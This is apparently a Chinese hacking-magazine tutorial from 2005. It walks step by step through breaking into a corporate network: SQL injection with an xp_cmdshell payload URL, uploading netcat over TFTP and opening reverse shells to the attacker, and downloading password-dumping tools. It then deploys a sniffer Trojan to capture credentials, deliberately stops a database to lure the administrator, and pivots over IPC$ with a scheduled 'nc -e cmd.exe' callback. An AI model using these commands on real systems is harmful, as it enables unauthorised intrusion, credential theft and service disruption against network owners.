本文已在黑客防線05年第3期發表
04年不平凡的一年，各種漏洞相繼發現，各種入侵技巧也應運而生，原本固若金湯的機器，在新的漏洞面前，也變的弱不禁風。牛人發現並編寫的Serv-u的溢位程式，為提升系統許可權大開方便之門，NBSI把SQL注入發揮的淋漓盡致，PHP注入也日趨成熟，哪位怪才發現的上傳漏洞在很多指令碼中也都花樣倍出，像DV，DZ等等大名鼎鼎的論壇也是漏洞疊報，數家著名公司被敲詐，黑客組織也是明爭暗鬥，虛擬主機也飽受旁註困擾。攻與防就像矛與盾，從某種意義上來說，攻就是防，防就是攻！“千里之堤，潰於蟻穴”，一個小小的漏洞就可以攻克一臺機器，甚至佔領整個內部網路。本文以一臺機器為突破口，然後如何利用內網其它機器做跳板，最後控制目標機器（如果說利用一臺機器上的某個站點來控制其它站點叫直接旁註的話，偶想把利用同一網內最弱的一臺機器,來達到控制最強的機器叫問接旁註，比滲透入侵偶覺著好聽點，其實方法很多牛人早用爛了，偶在這裡現醜了）。

一、通過SQL注入漏洞，反向連線資料庫機器。

利用NBSI掃描發現存在SQL注入漏洞，而且還是SA許可權，如圖1

利用NBSI的DOS執行命令，輸入ipconfig –all 發現網址與WEB伺服器不同，但是從閘道器上來看是在同一網段內。執行netstat –an檢視資料庫伺服器所開的埠，發現很多1433埠都是WEB伺服器連線，21，23，80埠沒！利用NBSI的瀏覽目錄功能，沒發現機器上存在PCANYWHERE和SERV-U（利用它們可以遠端控制，提升許可權，或猜測口令）。利用net start 命令沒發現如瑞星，KV等防毒軟體或防火牆服務，然後利用HSCAN1。2和NMAP3。

7掃描資料庫伺服器的外網IP進，竟然沒掃到一個開放的埠！（估計機器上裝了硬體>防火牆！）對付防火牆，偶想到了反向連結，在本地開了一個TFTP，利用命令， tftp –I ip get nc.exe 很幸運的上傳了一個NC上去，利用同樣的方法也上傳了一個MT。EXE（MT.EXE是一個網路管理方面的軟體,依照yy3的說法,也就是 "七拼八湊來的，純粹是圖個方便。"可是這個方便個真的是太方便了,僅40K的一個程式，但是集合了近四十種的命令於一身）上去。也可以利用FTP命令，把FTP命令用ECHO命令寫進一個檔案裡面，最後在用FTP –S：FILENAME來實現檔案的下載。在本機利用NC監聽66埠，命令如下：NC –L –P 66 ，遠端機器上執行：

NC –E CMD。EXE  IP  66

不一會兒，一個SHELL就出來了（還是在這裡面執行命令爽啊，在NBSI裡憋死了，有時在NBSI裡執行命令時會出現“意外資料”，還要被破在遊覽器裡執行_cmdshell%20'dos">http://www.***.com.tw/***/***.asp?  mode=1&ID=256;exec%20master..xp_cmdshell%20'dos command';--）

利用net view  命令檢視共有三臺機器！如圖2 

在利用命令：NET VIEW //機器名  時得到的內容為空，看來是沒共享目錄啊！
二、上傳反彈、監聽木馬顯奇功。
利用MT。EXE –SYSINFO命令顯示出資料庫服務的系統資訊，網絡卡資訊，配置資訊，和所安裝的軟體資訊。如圖3（只截了系統資訊）

圖3
是WIN2003怪不得用MT –FINDPASS命令沒顯出密碼來，它只顯示的2K的密碼。利用命令

mt –netget http://www.***.com/findpass2003.exe（mt  -netget <url> <filename to saved>       ---Download from http/ftp.）下載到本地一個看WIN2003密碼的軟體！！執行findpass2003.exe後沒有在記憶體中找到密碼！（看來的想辦法讓管理員登入了！哈哈）執行命令： 

mt –netget  http://www.***.com/hacan120.rar   hscan.rar 下載一個HSCAN1。2進去，利用同樣的方法又下載進去一個UNRAR。EXE然後執行命令：unrar.exe x hscan.rar 這樣就把HSCAN。RAR解壓到HSCAN目錄當中了！可以利用HACSN1。2版本的DOS命令進行內網掃描，命令如下：hscan -h www.target.com -all –ping掃完其餘兩臺以後沒發現任何弱口令，但發現它們在內網中開了很多埠，如：21，80，135，139，3389 等
注意：HSCAN掃描完了以後，會生成報告，自動用瀏覽器開啟，應該利用MT –PSLIST  和MT –PSKILL把這個瀏覽器關掉！即然開了3389能不能利用埠重定向，把它定向到資料庫這臺機器上呢，經過實踐利用

mt -redirect <TargetIP> <TargetPort> <ListenPort>   ----TCP port redirector. 

和利用FPIPE都沒有成功（定向後，用NETSTAT –AN命令看是端向成功，但是在外網還是沒法訪問）哪資料庫這臺機器能不能利用帶反彈型的圖形木馬來控制螢幕呢？實踐證明利用神氣兒，灰鴿子，溯雪都失敗了！看來只能裝DOS版的後門了，哪試試APR欺騙如何？因在DOS下沒法安裝圖形介面的WINPCAP，所以ARPSINFFER。EXE無法執行！（後來自己做了一個DOS版的）這臺機器上除了作業系統，資料庫，WIN2003補丁外什麼都沒裝，難道真的就沒有辦法了嗎？這時偶想到了一個木馬，一個女黑客編寫的，即有反向連線功能，又有監聽功能，是什麼呢？聰明的朋友，你猜到了嗎？她就是大名鼎鼎，如雷貫耳，威名遠波，無所不知的WOLLF（偶好喜歡她啊！ 哈哈）執行

WOLLF –SETUP

後做一個反向連結的木馬，偶選擇的是反向連結所取的IP放在一個HTTP空間的檔案中！製作好後，同樣利用MT。EXE –NETGET命令下載到資料庫伺服器當中，執行後，它會自動向你的HTTP空間中存放的檔案中去取反向連結的IP和埠，這時你可以在本機上用NC –L –P PORT 慢慢等待，一會以後，反向連線成功了，輸密碼進入吧！如圖4

進入後，執行命令：SNIFF <Log_file> (她可以監聽 ftp/smtp/pop3/http四種密碼經過網絡卡的 )findpass2003.exe不是還沒找到密碼嗎?這時候,利用MT.EXE –PSKILL命令把它的資料庫停掉，偶就不信管理員不來！在WOLLF環境下執行EXIT退出（但是監聽程式還是在執行的，如果執行QUIT後，就不監聽了），累死偶了，睡覺去了！
一覺醒來，太陽都老高了，睡懶覺可真舒服啊！在倒連上去看看有沒有抓到有價值的資訊，先輸入命令：SNIFF_STOP把監聽停下，在利用WOLLF帶的GET命令把監聽的檔案下載下來，哈，收穫可真不小如圖5所示：

圖5所示監聽到固若金湯的WEB伺服器的一個80埠的使用者名稱和密碼，登入上一看，原理是一個會員的！還監聽到一臺機器的21埠的使用者名稱和密碼了和這臺機器的25埠的一個MAIL，檢視其IP後發現它就是上面利用NET VIEW看到的三臺機器中的一臺，就叫它“郵件WEB伺服器”吧，在外網掃描還發現它開了80埠！看來這臺機器有兩個作用：一是作為郵件伺服器，另一個作用就是開了80埠，上面放了部網站內容，而主要網站的內容則在哪臺固若金湯的WEB伺服器上（在外網掃描它進，只開了80埠，真夠狠！哪臺郵件WEB伺服器對外網也僅開了21，25，80，110四個埠）先別忙登入啊！可不要忘了哪個findpass2003命令啊！如圖6：

利用net user username看了一下這個使用者是管理員啊！密碼設定的很變態字母數字特殊字元都有，管理員一般都有一個習慣，所有機器上的管理員的密碼都相同，後來驗證，果然如此！
得到使用者名稱和密碼後，試圖在資料庫伺服器上對另外兩臺機器執行命令：net use //IP/admin$ passwd /user:username 均沒有成功！
三、郵件WEB伺服器做跳板，直搗黃龍;
FTP登入郵件WEB伺服器，還是Serv-U FTP-Server v2.5k，會不會能溢位呢？登入成功後，上傳一個海頂2005和NC。EXE上去，再次反向連結如圖：7

利用IPC漏洞（在這臺機器上對WEB伺服器竟然能成功！哈哈）
1.net use //WEB伺服器/admin$ password /user: username
其中username,password為連線遠端主機時提供的使用者名稱與密碼
2.copy x:/nc.exe //WEB伺服器/admin$
拷貝NC到WEB伺服器上
3.net time //遠端主機名
顯示WEB伺服器當前的時間假如為09：12
3.at //WEB伺服器 09：14 nc.exe –e cmd.exe  218.***.***.165 99
在09：14分WEB伺服器自動NC反向連結偶的機器的99埠。如圖8

2分鐘過去，終於成功了，終於進入到哪臺固若金湯的WEB伺服器裡面了！成功後介面如圖9：

其中在反彈的SHELL中利用XYZCMD。EXE這個工具進行在次登入時，沒有成功，也就是SHELL中在出SHELL時沒有成功，看來是不支援資料的二互動。圖中同現的網址已做處理，如有雷同，純屬巧合。希望本方法對大家有所幫助，不管是攻還是防！！